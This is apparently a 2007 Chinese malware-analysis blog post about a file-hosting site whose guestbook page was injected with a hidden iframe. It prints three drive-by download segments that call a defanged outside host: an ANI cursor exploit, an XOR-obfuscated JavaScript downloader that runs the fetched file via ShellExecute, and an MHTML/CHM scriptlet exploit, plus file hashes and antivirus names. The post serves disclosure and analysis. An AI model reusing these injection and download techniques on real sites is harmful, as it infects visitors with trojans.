某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码

endurer 原创
2007-04-30 第1版

该网站的留言板页面：
/---
＜Iframe id="fralyb" name="fralyb2" src="kh_lyb.aspx?user=2**5***" scrolling="auto" frameborder="0" width=100% height="100%"＞＜/iframe＞
---/

被植入代码：
/---
＜iframe src=hxxp://cool***.4*7*5***55.com/k3.htm width=100 height=1 frameborder=0＞＜/iframe＞ 
---/
 
hxxp://cool***.4*7*5***55.com/k3.htm 包含3段恶意代码。

恶意代码段1：
/---
＜DIV style="CURSOR: url(hxxp://cool***.4*7*5***55.com/9.gif)"＞＜/DIV＞＜/DIV＞
---/

hxxp://cool***.4*7*5***55.com/9.gif （瑞星报为Hack.SuspiciousAni
）中包含信息：“By Mr.owen[F.S.T] ”，利用 ANI漏洞下载 xx.exe

文件说明符 : d:/test/xx.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-30 12:58:12
修改时间 : 2007-4-30 12:58:6
访问时间 : 2007-4-30 13:10:2
大小 : 14902 字节 14.566 KB
MD5 : 046257b53f474770dd1e2a149b2ba823

Kaspersky 报为 Trojan-Downloader.Win32.Small.eqe，瑞星报为：Trojan.DL.Inject.xz。

恶意代码段2：
/---
var J=function(m){return String.fromCharCode(m^99)};
eval（J(5)……（略）……+J(67)+'');
---/

解密结果为JavaScript脚本，功能是利用 Microsoft.XMLhttp 和 scrīpting.FileSystemObject 下载文件 kehu0739.exe，保存到%windir%，文件名由自定义函数：

/---
function gn（n）｛var number ＝ Math.random（）＊n;
return ＇~tmp＇＋　＇.tmp＇；｝
---/
生成，即~tmp.tmp。然后通过 Shell.Application 对象Q 的 ShellExecute 方法 执行命令： %windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。

恶意代码段3：
/---
＜OBJECT style="display:none" type="tex&#116&#47&#120&#45&#115&#99&#114iptlet" data="MK:@MSITSto&#114&#101&#58&#109&#104tml:c:\.mht&#33hxxp://cool***.4*7*5***55.com/count.html::/%6C%65%66t&#46htm"＞＜/OBJECT＞
---/

解密后为
/---
＜OBJECT style="display:none" type="text/x-scriptlet" data="MK:@MSITStore:mhtml:c:/.mht!hxxp://cool***.4*7*5***55.com/count.html::/%6C%65%66t.htm"＞＜/OBJECT＞
---/

hxxp://cool***.4*7*5***55.com/count.html 其实是个CHM文件，释放并运行文件QQ.EXE
/---
文件说明符 : d:/test/QQ.EXE
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-30 13:39:46
修改时间 : 2007-4-30 13:39:46
访问时间 : 2007-4-30 13:41:52
大小 : 11208 字节 10.968 KB
MD5 : f04973fb8267827f347594b373732290

nSPack 1.3 -＞ North Star/Liu Xing Ping
---/

瑞星报为：Trojan.DL.Agent.alw